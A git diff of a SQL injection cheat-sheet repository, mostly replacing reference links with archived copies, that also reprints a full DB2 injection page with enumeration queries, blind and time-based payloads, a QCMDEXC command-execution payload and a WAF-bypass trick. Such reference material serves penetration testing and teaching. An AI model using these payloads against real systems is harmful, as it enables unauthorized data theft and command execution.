-| -------------------------- | --------------------------------- |
-| `--`                       | SQL comment                       |
-
-## DB2 Default Databases
-
-| Name        | Description                                                           |
-| ----------- | --------------------------------------------------------------------- |
-| SYSIBM      | Core system catalog tables storing metadata for database objects.     |
-| SYSCAT      | User-friendly views for accessing metadata in the SYSIBM tables.      |
-| SYSSTAT     | Statistics tables used by the DB2 optimizer for query optimization.   |
-| SYSPUBLIC   | Metadata about objects available to all users (granted to PUBLIC).    |
-| SYSIBMADM   | Administrative views for monitoring and managing the database system. |
-| SYSTOOLs    | Tools, utilities, and auxiliary objects provided for database administration and troubleshooting. |
-
-## DB2 Enumeration
-
-| Description      | SQL Query |
-| ---------------- | ----------------------------------------- |
-| DBMS version     | `select versionnumber, version_timestamp from sysibm.sysversions;` |
-| DBMS version     | `select service_level from table(sysproc.env_get_inst_info()) as instanceinfo` |
-| DBMS version     | `select getvariable('sysibm.version') from sysibm.sysdummy1` |
-| DBMS version     | `select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo` |
-| DBMS version     | `select service_level,bld_level from sysibmadm.env_inst_info` |
-| Current user     | `select user from sysibm.sysdummy1` |
-| Current user     | `select session_user from sysibm.sysdummy1` |
-| Current user     | `select system_user from sysibm.sysdummy1` |
-| Current database | `select current server from sysibm.sysdummy1` |
-| OS info          | `select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info` |
-
-## DB2 Methodology
-
-| Description      | SQL Query |
-| ---------------- | ------------------------------------ |
-| List databases   | `SELECT distinct(table_catalog) FROM sysibm.tables` |
-| List databases   | `SELECT schemaname FROM syscat.schemata;` |
-| List columns     | `SELECT name, tbname, coltype FROM sysibm.syscolumns` |
-| List tables      | `SELECT table_name FROM sysibm.tables` |
-| List tables      | `SELECT name FROM sysibm.systables` |
-| List tables      | `SELECT tbname FROM sysibm.syscolumns WHERE name='username'` |
-
-## DB2 Error Based
-
-```sql
--- Returns all in one xml-formatted string
-select xmlagg(xmlrow(table_schema)) from sysibm.tables
-
--- Same but without repeated elements
-select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables)
-
--- Returns all in one xml-formatted string.
--- May need CAST(xml2clob(… AS varchar(500)) to display the result.
-select xml2clob(xmelement(name t, table_schema)) from sysibm.tables 
-```
-
-## DB2 Blind Based
-
-| Description      | SQL Query |
-| ---------------- | ------------------------------------------ |
-| Substring        | `select substr('abc',2,1) FROM sysibm.sysdummy1` |
-| ASCII value      | `select chr(65) from sysibm.sysdummy1`     |
-| CHAR to ASCII    | `select ascii('A') from sysibm.sysdummy1`  |
-| Select Nth Row   | `select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only` |
-| Bitwise AND      | `select bitand(1,0) from sysibm.sysdummy1` |
-| Bitwise AND NOT  | `select bitandnot(1,0) from sysibm.sysdummy1` |
-| Bitwise OR       | `select bitor(1,0) from sysibm.sysdummy1`  |
-| Bitwise XOR      | `select bitxor(1,0) from sysibm.sysdummy1` |
-| Bitwise NOT      | `select bitnot(1,0) from sysibm.sysdummy1` |
-
-## DB2 Time Based
-
-Heavy queries, if user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
-
-```sql
-' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 
-```
-
-## DB2 Command Execution
-
-> The QSYS2.QCMDEXC() procedure and scalar function can be used to execute IBM i CL commands.
-
-Using the `QSYS2.QCMDEXC()` on IBM i (previously named AS-400), it is possibile to achieve command execution.
-
-```sql
-'||QCMDEXC('QSH CMD(''system dspusrprf PROFILE'')')
-```
-
-## DB2 WAF Bypass
-
-### Avoiding Quotes
-
-```sql
-SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1
-```
-
-## DB2 Accounts and Privileges
-
-| Description      | SQL Query |
-| ---------------- | ------------------------------------ |
-| List users | `select distinct(grantee) from sysibm.systabauth` |
-| List users | `select distinct(definer) from syscat.schemata` |
-| List users | `select distinct(authid) from sysibmadm.privileges` |
-| List users | `select grantee from syscat.dbauth` |
-| List privileges | `select * from syscat.tabauth` |
-| List privileges | `select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies` |
-| List DBA accounts | `select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'` |
-| List DBA accounts | `select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'` |
-| Location of DB files | `select * from sysibmadm.reg_variables where reg_var_name='DB2PATH'` |
-
-## References
-
-* [DB2 SQL injection cheat sheet - Adrián - May 20, 2012](https://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/)
-* [Pentestmonkey's DB2 SQL Injection Cheat Sheet - @pentestmonkey - September 17, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
-* [QSYS2.QCMDEXC() - IBM Support - April 22, 2023](https://www.ibm.com/support/pages/qsys2qcmdexc)
+# DB2 Injection
+
+> IBM DB2 is a family of relational database management systems (RDBMS) developed by IBM. Originally created in the 1980s for mainframes, DB2 has evolved to support various platforms and workloads, including distributed systems, cloud environments, and hybrid deployments.
+
+## Summary
+
+* [DB2 Comments](#db2-comments)
+* [DB2 Default Databases](#db2-default-databases)
+* [DB2 Enumeration](#db2-enumeration)
+* [DB2 Methodology](#db2-methodology)
+* [DB2 Error Based](#db2-error-based)
+* [DB2 Blind Based](#db2-blind-based)
+* [DB2 Time Based](#db2-time-based)
+* [DB2 Command Execution](#db2-command-execution)
+* [DB2 WAF Bypass](#db2-waf-bypass)
+* [DB2 Accounts and Privileges](#db2-accounts-and-privileges)
+* [References](#references)
+
+## DB2 Comments
+
+| Type                       | Description                       |
+| -------------------------- | --------------------------------- |
+| `--`                       | SQL comment                       |
+
+## DB2 Default Databases
+
+| Name        | Description                                                           |
+| ----------- | --------------------------------------------------------------------- |
+| SYSIBM      | Core system catalog tables storing metadata for database objects.     |
+| SYSCAT      | User-friendly views for accessing metadata in the SYSIBM tables.      |
+| SYSSTAT     | Statistics tables used by the DB2 optimizer for query optimization.   |
+| SYSPUBLIC   | Metadata about objects available to all users (granted to PUBLIC).    |
+| SYSIBMADM   | Administrative views for monitoring and managing the database system. |
+| SYSTOOLs    | Tools, utilities, and auxiliary objects provided for database administration and troubleshooting. |
+
+## DB2 Enumeration
+
+| Description      | SQL Query |
+| ---------------- | ----------------------------------------- |
+| DBMS version     | `select versionnumber, version_timestamp from sysibm.sysversions;` |
+| DBMS version     | `select service_level from table(sysproc.env_get_inst_info()) as instanceinfo` |
+| DBMS version     | `select getvariable('sysibm.version') from sysibm.sysdummy1` |
+| DBMS version     | `select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo` |
+| DBMS version     | `select service_level,bld_level from sysibmadm.env_inst_info` |
+| Current user     | `select user from sysibm.sysdummy1` |
+| Current user     | `select session_user from sysibm.sysdummy1` |
+| Current user     | `select system_user from sysibm.sysdummy1` |
+| Current database | `select current server from sysibm.sysdummy1` |
+| OS info          | `select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info` |
+
+## DB2 Methodology
+
+| Description      | SQL Query |
+| ---------------- | ------------------------------------ |
+| List databases   | `SELECT distinct(table_catalog) FROM sysibm.tables` |
+| List databases   | `SELECT schemaname FROM syscat.schemata;` |
+| List columns     | `SELECT name, tbname, coltype FROM sysibm.syscolumns` |
+| List tables      | `SELECT table_name FROM sysibm.tables` |
+| List tables      | `SELECT name FROM sysibm.systables` |
+| List tables      | `SELECT tbname FROM sysibm.syscolumns WHERE name='username'` |
+
+## DB2 Error Based
+
+```sql
+-- Returns all in one xml-formatted string
+select xmlagg(xmlrow(table_schema)) from sysibm.tables
+
+-- Same but without repeated elements
+select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables)
+
+-- Returns all in one xml-formatted string.
+-- May need CAST(xml2clob(… AS varchar(500)) to display the result.
+select xml2clob(xmelement(name t, table_schema)) from sysibm.tables 
+```
+
+## DB2 Blind Based
+
+| Description      | SQL Query |
+| ---------------- | ------------------------------------------ |
+| Substring        | `select substr('abc',2,1) FROM sysibm.sysdummy1` |
+| ASCII value      | `select chr(65) from sysibm.sysdummy1`     |
+| CHAR to ASCII    | `select ascii('A') from sysibm.sysdummy1`  |
+| Select Nth Row   | `select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only` |
+| Bitwise AND      | `select bitand(1,0) from sysibm.sysdummy1` |
+| Bitwise AND NOT  | `select bitandnot(1,0) from sysibm.sysdummy1` |
+| Bitwise OR       | `select bitor(1,0) from sysibm.sysdummy1`  |
+| Bitwise XOR      | `select bitxor(1,0) from sysibm.sysdummy1` |
+| Bitwise NOT      | `select bitnot(1,0) from sysibm.sysdummy1` |
+
+## DB2 Time Based
+
+Heavy queries, if user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
+
+```sql
+' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68 
+```
+
+## DB2 Command Execution
+
+> The QSYS2.QCMDEXC() procedure and scalar function can be used to execute IBM i CL commands.
+
+Using the `QSYS2.QCMDEXC()` on IBM i (previously named AS-400), it is possibile to achieve command execution.
+
+```sql
+'||QCMDEXC('QSH CMD(''system dspusrprf PROFILE'')')
+```
+
+## DB2 WAF Bypass
+
+### Avoiding Quotes
+
+```sql
+SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1
+```
+
+## DB2 Accounts and Privileges
+
+| Description      | SQL Query |
+| ---------------- | ------------------------------------ |
+| List users | `select distinct(grantee) from sysibm.systabauth` |
+| List users | `select distinct(definer) from syscat.schemata` |
+| List users | `select distinct(authid) from sysibmadm.privileges` |
+| List users | `select grantee from syscat.dbauth` |
+| List privileges | `select * from syscat.tabauth` |
+| List privileges | `select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies` |
+| List DBA accounts | `select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'` |
+| List DBA accounts | `select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'` |
+| Location of DB files | `select * from sysibmadm.reg_variables where reg_var_name='DB2PATH'` |
+
+## References
+
+* [DB2 SQL injection cheat sheet - Adrián - May 20, 2012](https://web.archive.org/web/20211026090110/https://securityetalii.es/2012/05/20/db2-sql-injection-cheat-sheet/)
+* [Pentestmonkey's DB2 SQL Injection Cheat Sheet - @pentestmonkey - September 17, 2011](https://web.archive.org/web/20260226035803/https://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
+* [QSYS2.QCMDEXC() - IBM Support - April 22, 2023](https://web.archive.org/web/20230305185053/https://www.ibm.com/support/pages/qsys2qcmdexc)
diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md
index 55239c5..e07e464 100644
--- a/SQL Injection/MSSQL Injection.md	
+++ b/SQL Injection/MSSQL Injection.md	
@@ -433,11 +433,11 @@ Use `SP_PASSWORD` in a query to hide from the logs like : `' AND 1=1--sp_passwor
 
 ## References
 
-* [AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice - Marc Olivier Bergeron - June 21, 2023](https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/)
+* [AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice - Marc Olivier Bergeron - June 21, 2023](https://web.archive.org/web/20240219205617/https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/)
 * [Error based SQL Injection in "Order By" clause - Manish Kishan Tanwar - March 26, 2018](https://github.com/incredibleindishell/exploit-code-by-me/blob/master/MSSQL%20Error-Based%20SQL%20Injection%20Order%20by%20clause/Error%20based%20SQL%20Injection%20in%20“Order%20By”%20clause%20(MSSQL).pdf)
-* [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - January 28, 2009](https://www.exploit-db.com/papers/12975)
-* [IS_SRVROLEMEMBER (Transact-SQL) - Microsoft - April 9, 2024](https://docs.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver15)
-* [MSSQL Injection Cheat Sheet - @pentestmonkey - August 30, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
-* [MSSQL Trusted Links - HackTricks - September 15, 2024](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
-* [SQL Server - Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
-* [sys.fn_my_permissions (Transact-SQL) - Microsoft - January 25, 2024](https://docs.microsoft.com/en-us/sql/relational-databases/system-functions/sys-fn-my-permissions-transact-sql?view=sql-server-ver15)
+* [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - January 28, 2009](https://web.archive.org/web/20260222213546/https://www.exploit-db.com/papers/12975)
+* [IS_SRVROLEMEMBER (Transact-SQL) - Microsoft - April 9, 2024](https://web.archive.org/web/20220906233249/https://docs.microsoft.com/en-us/SQL/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver15)
+* [MSSQL Injection Cheat Sheet - @pentestmonkey - August 30, 2011](https://web.archive.org/web/20260214013447/https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
+* [MSSQL Trusted Links - HackTricks - September 15, 2024](https://web.archive.org/web/20241126085555/https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
+* [SQL Server - Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6, 2013](https://web.archive.org/web/20210227063841/https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
+* [sys.fn_my_permissions (Transact-SQL) - Microsoft - January 25, 2024](https://web.archive.org/web/20220907211545/https://docs.microsoft.com/en-us/SQL/relational-databases/system-functions/sys-fn-my-permissions-transact-sql?view=sql-server-ver15)
diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index 52f9636..a32331d 100644
--- a/SQL Injection/MySQL Injection.md	
+++ b/SQL Injection/MySQL Injection.md	
@@ -763,13 +763,13 @@ Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the back
 ## References
 
 * [[SQLi] Extracting data without knowing columns names - Ahmed Sultan - February 9, 2019](https://blog.redforce.io/sqli-extracting-data-without-knowing-columns-names/)
-* [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection - Marc Olivier Bergeron - October 19, 2021](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)
-* [Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
+* [A Scientific Notation Bug in MySQL left AWS WAF Clients Vulnerable to SQL Injection - Marc Olivier Bergeron - October 19, 2021](https://web.archive.org/web/20211019152624/https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/)
+* [Alternative for Information_Schema.Tables in MySQL - Osanda Malith Jayathissa - February 3, 2017](https://web.archive.org/web/20260227032450/https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
 * [Ekoparty CTF 2016 (Web 100) - p4-team - October 26, 2016](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100)
-* [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://sqlwiki.netspi.com/injectionTypes/errorBased)
-* [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010](https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
-* [MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018](https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
-* [SQL injection - The oldschool way - 02 - Ahmed Sultan - January 1, 2025](https://www.youtube.com/watch?v=u91EdO1cDak)
-* [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://resources.infosecinstitute.com/sql-truncation-attack/)
-* [SQLi filter evasion cheat sheet (MySQL) - Johannes Dahse - December 4, 2010](https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
+* [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://web.archive.org/web/20210215172533/https://sqlwiki.netspi.com/injectionTypes/errorBased/)
+* [How to Use SQL Calls to Secure Your Web Site - IPA ISEC - March 2010](https://web.archive.org/web/20240118024024/https://www.ipa.go.jp/security/vuln/ps6vr70000011hc4-att/000017321.pdf)
+* [MySQL Out of Band Hacking - Osanda Malith Jayathissa - February 23, 2018](https://web.archive.org/web/20260303030701/https://www.exploit-db.com/docs/english/41273-mysql-out-of-band-hacking.pdf)
+* [SQL injection - The oldschool way - 02 - Ahmed Sultan - January 1, 2025](https://web.archive.org/web/20250807062504/https://www.youtube.com/watch?si=kFQkvCEn2NiWLDGY&v=u91EdO1cDak&feature=youtu.be)
+* [SQL Truncation Attack - Rohit Shaw - June 29, 2014](https://web.archive.org/web/20201001181524/https://resources.infosecinstitute.com/sql-truncation-attack/)
+* [SQLi filter evasion cheat sheet (MySQL) - Johannes Dahse - December 4, 2010](https://web.archive.org/web/20101209155346/http://websec.wordpress.com:80/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql)
 * [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://websec.ca/kb/sql_injection#MySQL_Default_Databases)
diff --git a/SQL Injection/OracleSQL Injection.md b/SQL Injection/OracleSQL Injection.md
index 37a560f..767aa8d 100644
--- a/SQL Injection/OracleSQL Injection.md	
+++ b/SQL Injection/OracleSQL Injection.md	
@@ -229,8 +229,8 @@ utl_file.put_line(utl_file.fopen('/path/to/','file','R'), <buffer>)
 ## References
 
 * [ASDC12 - New and Improved Hacking Oracle From Web - Sumit “sid” Siddharth - November 8, 2021](https://web.archive.org/web/20211108150011/https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
-* [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
+* [Error Based Injection | NetSPI SQL Injection Wiki - NetSPI - February 15, 2021](https://web.archive.org/web/20260203031530/https://sqlwiki.netspi.com/injectionTypes/errorBased/)
 * [ODAT: Oracle Database Attacking Tool - quentinhardy - March 24, 2016](https://github.com/quentinhardy/odat/wiki/privesc)
-* [Oracle SQL Injection Cheat Sheet - @pentestmonkey - August 30, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
-* [Pentesting Oracle TNS Listener - HackTricks - July 19, 2024](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
-* [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://www.websec.ca/kb/sql_injection#Oracle_Default_Databases)
+* [Oracle SQL Injection Cheat Sheet - @pentestmonkey - August 30, 2011](https://web.archive.org/web/20260228095123/https://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet)
+* [Pentesting Oracle TNS Listener - HackTricks - July 19, 2024](https://web.archive.org/web/20220519160744/https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
+* [The SQL Injection Knowledge Base - Roberto Salgado - May 29, 2013](https://web.archive.org/web/20260302110304/https://www.websec.ca/kb/sql_injection)
diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md
index 917f5f1..89e9c69 100644
--- a/SQL Injection/PostgreSQL Injection.md	
+++ b/SQL Injection/PostgreSQL Injection.md	
@@ -281,10 +281,10 @@ SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
 
 ## References
 
-* [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
-* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - Leon Juranic - June 17, 2009](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf)
-* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - GreenWolf - March 20, 2019](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
-* [Postgres SQL Injection Cheat Sheet - @pentestmonkey - August 23, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
-* [PostgreSQL 9.x Remote Command Execution - dionach - October 26, 2017](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
-* [SQL Injection /webApp/oma_conf ctx parameter - Sergey Bobrov (bobrov) - December 8, 2016](https://hackerone.com/reports/181803)
-* [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://pulsesecurity.co.nz/articles/postgres-sqli)
+* [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://web.archive.org/web/20250812102408/https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
+* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - Leon Juranic - June 17, 2009](https://web.archive.org/web/20200927000909/https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf)
+* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - GreenWolf - March 20, 2019](https://web.archive.org/web/20250803101126/https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
+* [Postgres SQL Injection Cheat Sheet - @pentestmonkey - August 23, 2011](https://web.archive.org/web/20260302153609/https://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
+* [PostgreSQL 9.x Remote Command Execution - dionach - October 26, 2017](https://web.archive.org/web/20201001043242/https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
+* [SQL Injection /webApp/oma_conf ctx parameter - Sergey Bobrov (bobrov) - December 8, 2016](https://web.archive.org/web/20240613225549/https://hackerone.com/reports/181803)
+* [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://web.archive.org/web/20251210040037/https://pulsesecurity.co.nz/articles/postgres-sqli)
diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index 71e66a5..7612a9f 100644
--- a/SQL Injection/README.md	
+++ b/SQL Injection/README.md	
@@ -148,7 +148,7 @@ SELECT * FROM users WHERE username = '' OR '1'='1'--' AND password = '';
 
 Here, `'1'='1'` is always true, which means the query could return a valid user, effectively bypassing the authentication check.
 
-:warning: In this case, the database will return an array of results because it will match every users in the table. This will produce an error in the server side since it was expecting only one result. By adding a `LIMIT` clause, you can restrict the number of rows returned by the query. 
+:warning: In this case, the database will return an array of results because it will match every users in the table. This will produce an error in the server side since it was expecting only one result. By adding a `LIMIT` clause, you can restrict the number of rows returned by the query.
 
 By submitting the following payload in the username field, you will log in as the first user in the database. Additionally, you can inject a payload in the password field while using the correct username to target a specific user.
 
@@ -187,7 +187,7 @@ sql1 = "SELECT * FROM admin WHERE pass = ''or'6�]��!r,��b'";
 
 ### Hashed Passwords
 
-By 2025, applications almost never store plaintext passwords. Authentication systems instead use a representation of the password (a hash derived by a key-derivation function, often with a salt). That evolution changes the mechanics of some classic SQL injection (SQLi) bypasses: an attacker who injects rows via `UNION` must now supply values that match the stored representation the application expects, not the user’s raw password.
+By 2025, applications almost never store plaintext passwords. Authentication systems instead use a representation of the password (a hash derived by a key-derivation function, often with a salt). That evolution changes the mechanics of some classic SQL injection (SQLi) bypasses: an attacker who injects rows via `UNION` must now supply values that match the stored representation the application expects, not the user's raw password.
 
 Many naïve authentication flows perform these high-level steps:
 
@@ -385,7 +385,7 @@ In short, the result of the first SQL query is used to build the second SQL quer
 ## Second Order SQL Injection
 
 Second Order SQL Injection is a subtype of SQL injection where the malicious SQL payload is primarily stored in the application's database and later executed by a different functionality of the same application.
-Unlike first-order SQLi, the injection doesn’t happen right away. It is **triggered in a separate step**, often in a different part of the application.
+Unlike first-order SQLi, the injection doesn't happen right away. It is **triggered in a separate step**, often in a different part of the application.
 
 1. User submits input that is stored (e.g., during registration or profile update).
 
@@ -584,13 +584,13 @@ Bypass using keywords case insensitive or an equivalent operator.
 
 ## References
 
-* [A Novel Technique for SQL Injection in PDO’s Prepared Statements - Adam Kues - July 21, 2025](https://slcyber.io/assetnote-security-research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements)
+* [A Novel Technique for SQL Injection in PDO's Prepared Statements - Adam Kues - July 21, 2025](https://web.archive.org/web/20251017002820/https://slcyber.io/assetnote-security-research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/)
 * [Analyzing CVE-2018-6376 – Joomla!, Second Order SQL Injection - Not So Secure - February 9, 2018](https://web.archive.org/web/20180209143119/https://www.notsosecure.com/analyzing-cve-2018-6376/)
-* [Implement a Blind Error-Based SQLMap payload for SQLite - soka - August 24, 2023](https://sokarepo.github.io/web/2023/08/24/implement-blind-sqlite-sqlmap.html)
-* [Manual SQL Injection Discovery Tips - Gerben Javado - August 26, 2017](https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
-* [NetSPI SQL Injection Wiki - NetSPI - December 21, 2017](https://sqlwiki.netspi.com/)
-* [PentestMonkey's mySQL injection cheat sheet - @pentestmonkey - August 15, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
-* [SQLi Cheatsheet - NetSparker - March 19, 2022](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
-* [SQLi in INSERT worse than SELECT - Mathias Karlsson - February 14, 2017](https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
+* [Implement a Blind Error-Based SQLMap payload for SQLite - soka - August 24, 2023](https://web.archive.org/web/20250513112724/https://sokarepo.github.io/web/2023/08/24/implement-blind-sqlite-sqlmap.html)
+* [Manual SQL Injection Discovery Tips - Gerben Javado - August 26, 2017](https://web.archive.org/web/20170826221724/https://gerbenjavado.com/manual-sql-injection-discovery-tips/)
+* [NetSPI SQL Injection Wiki - NetSPI - December 21, 2017](https://web.archive.org/web/20171221044609/https://sqlwiki.netspi.com/)
+* [PentestMonkey's mySQL injection cheat sheet - @pentestmonkey - August 15, 2011](https://web.archive.org/web/20260109024910/https://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
+* [SQLi Cheatsheet - NetSparker - March 19, 2022](https://web.archive.org/web/20220219223426/https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
+* [SQLi in INSERT worse than SELECT - Mathias Karlsson - February 14, 2017](https://web.archive.org/web/20231004093323/https://labs.detectify.com/2017/02/14/sqli-in-insert-worse-than-select/)
 * [SQLi Optimization and Obfuscation Techniques - Roberto Salgado - 2013](https://web.archive.org/web/20221005232819/https://paper.bobylive.com/Meeting_Papers/BlackHat/USA-2013/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf)
-* [The SQL Injection Knowledge base - Roberto Salgado - May 29, 2013](https://websec.ca/kb/sql_injection)
+* [The SQL Injection Knowledge base - Roberto Salgado - May 29, 2013](https://web.archive.org/web/20260302110304/https://www.websec.ca/kb/sql_injection)
diff --git a/SQL Injection/SQLite Injection.md b/SQL Injection/SQLite Injection.md
index 0a327a3..019c7a9 100644
--- a/SQL Injection/SQLite Injection.md	
+++ b/SQL Injection/SQLite Injection.md	
@@ -150,6 +150,6 @@ SELECT writefile('/path/to/file', column_name) FROM table_name
 
 ## References
 
-* [Injecting SQLite database based application - Manish Kishan Tanwar - February 14, 2017](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
-* [SQLite Error Based Injection for Enumeration - Rio Asmara Suryadi - February 6, 2021](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)
+* [Injecting SQLite database based application - Manish Kishan Tanwar - February 14, 2017](https://web.archive.org/web/20211205031408/https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
+* [SQLite Error Based Injection for Enumeration - Rio Asmara Suryadi - February 6, 2021](https://web.archive.org/web/20210221065923/http://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)
 * [SQLite3 Injection Cheat sheet - Nickosaurus Hax - May 31, 2012](https://web.archive.org/web/20131208191957/https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
diff --git a/SQL Injection/SQLmap.md b/SQL Injection/SQLmap.md
index ce7b0a7..c434acc 100644
--- a/SQL Injection/SQLmap.md	
+++ b/SQL Injection/SQLmap.md	
@@ -345,5 +345,5 @@ sqlmap -d "mysql://user:pass@ip/database" --dump-all
 
 ## References
 
-* [#SQLmap protip - @zh4ck - March 10, 2018](https://twitter.com/zh4ck/status/972441560875970560)
-* [Exploiting Second Order SQLi Flaws by using Burp & Custom Sqlmap Tamper - Mehmet Ince - August 1, 2017](https://pentest.blog/exploiting-second-order-sqli-flaws-by-using-burp-custom-sqlmap-tamper/)
+* [#SQLmap protip - @zh4ck - March 10, 2018](https://web.archive.org/web/20240827145141/https://twitter.com/zh4ck/status/972441560875970560)
